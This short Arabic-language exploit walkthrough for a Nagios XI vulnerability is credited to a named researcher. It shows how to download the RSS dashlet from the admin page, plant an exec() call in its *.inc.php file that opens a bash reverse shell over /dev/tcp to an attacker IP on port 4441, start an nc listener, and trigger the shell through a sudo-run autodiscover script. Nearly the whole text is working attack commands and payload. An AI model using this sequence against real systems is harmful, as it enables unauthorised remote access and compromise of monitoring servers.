
CVE تم اكتشافها بواسطة: K. Wahab (Neo`X)
يُستخدم RSS Dashlet في هذا المثال.
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
انتقل إلى صفحة إدارة "dashlets" وقم بتنزيل dashlet:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
عدّل ملف *.inc.php:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(ملاحظة: بعد تنفيذ الأمر ستستقبل اتصالًا كمستخدم APACHE، استخدم CTRL+C للخروج وأعد تشغيل المستمع عدة مرات)
